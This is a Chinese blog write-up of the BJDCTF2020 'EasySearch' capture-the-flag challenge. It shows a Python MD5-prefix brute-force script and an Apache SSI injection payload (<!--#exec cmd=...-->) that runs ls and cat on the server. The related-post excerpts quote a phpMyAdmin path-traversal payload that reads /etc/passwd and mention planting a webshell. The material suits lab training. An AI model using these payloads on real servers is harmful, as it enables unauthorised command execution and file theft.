BUU-WEB-[BJDCTF2020]EasySearch

最新推荐文章于 2023-02-08 22:01:48 发布
最新推荐文章于 2023-02-08 22:01:48 发布
阅读量405 收藏
点赞数
分类专栏: BUU-WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24033605/article/details/117037958
版权

[BJDCTF2020]EasySearch


扫描找到主页的备份源码。 

index.php.swp

在这里插入图片描述
1.passwd的md5前6位是6d0bc1
2. 成功提交后生成一个shtml文件。(SSI远程命令执行)
爆破一下,看看有哪些md5的前六位符合。

import hashlib

a = "0123456789"
for o in a:
    for p in a:
        for q in a:
            for r in a:
                for s in a:
                    for t in a:
                        for u in a:
                            b = str(o)+str(p)+str(q)+str(r)+str(s)+str(t)+str(u)
                            md5 = hashlib.md5(b.encode('utf-8')).hexdigest()
                            if((md5[0:6])=='6d0bc1'):
                                print(b)

在这里插入图片描述
爆破出密码后就可以登录了,username随意没有要求,只有密码有要求。
在这里插入图片描述

上传成功后,发现创建了一个.shtml的文件,转到文件下。
在这里插入图片描述
利用SSI注入漏洞,我们可以在username变量中传入SSI语句来远程执行系统命令。

#SSI命令格式
<!--#exec cmd="命令"-->

尝试ls一下。
在这里插入图片描述
在这里插入图片描述
没找打flag文件,再ls一下上级目录。
在这里插入图片描述
在这里插入图片描述
找到目标文件,尝试使用cat打开。
在这里插入图片描述
在这里插入图片描述
成功获取flag。

TzZzEZ-web
关注
专栏目录
BUUCTF web [BJDCTF2020]EasySearch wp
Whaocai的博客
08-02 343
考点 ①ssi注入 进去之后是一个登录框,猜测有没有register.php,经过测试也不存在sql注入。直接御剑扫描(扫buuctf上的题要调线程和超时,我是线程10超时15,不然会被平台禁掉)。扫出来了index.php.swp index.php.swp源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$
buu-[BJDCTF2020]BJD hamburger competition
qaq517384的博客
03-13 4576
解压出来是一个游戏,冇趣 新东西,去看看unity游戏逆向 了解到unity游戏的主要逻辑都在Assembly-CSharp.dll 利用dnSpy打开该文件,第一次没啥经验,一个一个翻函数 Init.secret ^= 127; string str = Init.secret.ToString(); if (ButtonSpawnFruit.Sha1(str) == "DD01903921EA24941C26A48F2CEC24E0BB0E8CC7") { this.result = "
buuCTF [BJDCTF2020]EasySearch 1
weixin_45642610的博客
04-14 1751
buuCTF [BJDCTF2020]EasySearch 1 进去后是这样 扫后台发现index.php.swp备份。 这里吐槽一下。我用dirsearch扫了3次都没出来,最后用dirmap指定字典才出来。网上的字典大部分没包含index.php.swp的,还要自己添加到字典里。 要求password的md5值的6个字符为6d0bc1。敲代码(python): from hashlib import md5 for i in range(10000000): if md5(str(i).
BUUCTF [BJDCTF2020] EasySearch
Senimo
01-06 754
BUUCTF [BJDCTF2020] EasySearch 考点: Apache SSI 远程命令执行 shtml文件 启动环境: 一个登录框,尝试了弱密码与万能密码,均无结果,继续对题目进行信息收集,使用ctf-wscan扫描目录: python3 ctf-wscan.py http://c4567f9c-24a4-42fd-a60f-1e02b2aa1f07.node3.buuoj.cn/ 得到扫描结果,其存在index.php.swp文件: <?php ob_start(); f
BUUCTF-WEBBJDCTF2020EasySearch 1
qq_36410265的博客
02-08 384
SSI(服务端包含)
buuctf-EasySearch
m0_62094846的博客
05-14 291
特意搜了下题目,以为有什么提示,结果是一个搜索插件 然后用注入,爆破密码,都没用 扫描后台发现index.php.swp备份(我用御剑没扫出来,下次要安装一些其他的扫描工具,用dirmap指定字典才出来。网上的字典大部分没包含index.php.swp的,还要自己添加到字典里。) <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0..
buu-[ACTF新生赛2020]SoulLike
qaq517384的博客
04-03 964
64elf文件
buu-[ACTF新生赛2020]Oruga
qaq517384的博客
03-13 805
64 字符串略过 查看main函数 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { __int64 result; // rax __int64 v4; // [rsp+0h] [rbp-40h] __int64 v5; // [rsp+0h] [rbp-40h] __int64 v6; // [rsp+0h] [rbp-40h] __int64 v7; // [rsp+0h] [rbp-40h] char v
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2791
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
BUUCTF WEB easysearch
qq_41696858的博客
01-07 1994
由于buuctf独特的防扫机制,建议加上 -s -t参数,等个10分钟 查看index.php.swp查看源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[
MD5算法创建6数字密码
07-12
基于时间的动态密码,每天产生的密码不一样,利用的是MD5算法。不同的日期,不同的编号,产生的密码是不一样的,密码是6数字,重复率低,逆向破解难度大!
buu easyre
liuxiaohuai_的博客
12-09 712
buu 逆向方向的第一题非常简单 下载文件后解压直接拖进ida64打开后就可以看到flag 得到:flag{this_Is_a_EaSyRe}
web buuctf [BJDCTF2020]EasySearch
weixin_44214568的博客
04-12 575
知识点:Apache SSI漏洞 Apache安全漏洞_0ak1ey的博客-CSDN博客_apache漏洞 Apache SSI远程命令执行漏洞_0ak1ey的博客-CSDN博客_apache命令执行漏洞 Apache SSI 远程命令执行漏洞 - MCY5 - 博客园 1.开题: 看到题目的时候,我就准备用dirsearch扫描,但是没有扫描出来,我又御剑扫了一遍,第一遍没扫出来,我把线程改成1才扫出来的, 2.贴源码 <?php ob_start(); functio.
[BJDCTF2020]EasySearch
Hopeace的博客
10-14 303
题目名:[BJDCTF2020]EasySearch 作者:Hopeace 靶场地址:https://buuoj.cn/challenges#[BJDCTF2020]EasySearch 知识点:目录扫描,md5生成 0x01 浏览题目 进入主页就是一个登录框,甚至没有注册的地方 不是sql注入,就是要扫目录查看源码(试了一下常见的源码文件缺没有发现) python2 GitHack.py http://4296367a-aa3a-4d92-90a4-1dbefe590195.node4.buuoj.cn:
2020-08-10
Realiy的博客
08-10 195
9号是个懒狗没做题 [GKCTF2020]老八小超市儿 打开之后各种瞎点没有思路,大佬wp告诉我这种时候就要找管理后门,后门地址/admin.php,用户admin密码shopxo。 登录之后主题插马,先下载一个默认主题,将马插到里面再上传 之后从主页图片看到页面地址 http://8c45f2f9-5337-49d1-921b-2c712fe6aa66.node3.buuoj.cn/public/static/index/default/test.php 蚁剑连上 根目录找
BUUCTF(10.25-11.1)
XINO
11-23 4171
[GWCTF 2019]我有一个数据库 考点是phpmyadmin 进入该页面 phpmyadmin4.8.0-4.8.1存在文件包含漏洞 使用网上的payload直接打 先测试能不能用该数据库 payload ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 发现有回显后我们改成flag http://57a7979b-f822-4a63-8bcb-3e76fa076462.node4.buuoj.cn/phpmyadmin/?
[BUUCTF] 集训第五天
Dannie01的博客
10-02 553
[MRCTF2020]PYWebsite 查看源码 function enc(code){ hash = hex_md5(code); return hash; } function validate(){ var code = document.getElementById("vcode").value; if (code != ""){ if(hex_md5(code) == "0cd4da0223c0b280829
buu Quoted-printable
最新发布
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。 在解密Quoted-printable编码时,我们可以使用在线工具来帮助我们。一个可以使用的工具是[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。 根据提供的信息,得到的flag是"flag{那你也很棒哦}"。 总结:Quoted-printable是一种常见的邮件编码方法,用于将非ASCII字符转换为可打印的ASCII字符。解密Quoted-printable编码可以使用在线工具,如[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。根据提供的信息,得到的flag是"flag{那你也很棒哦}"。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值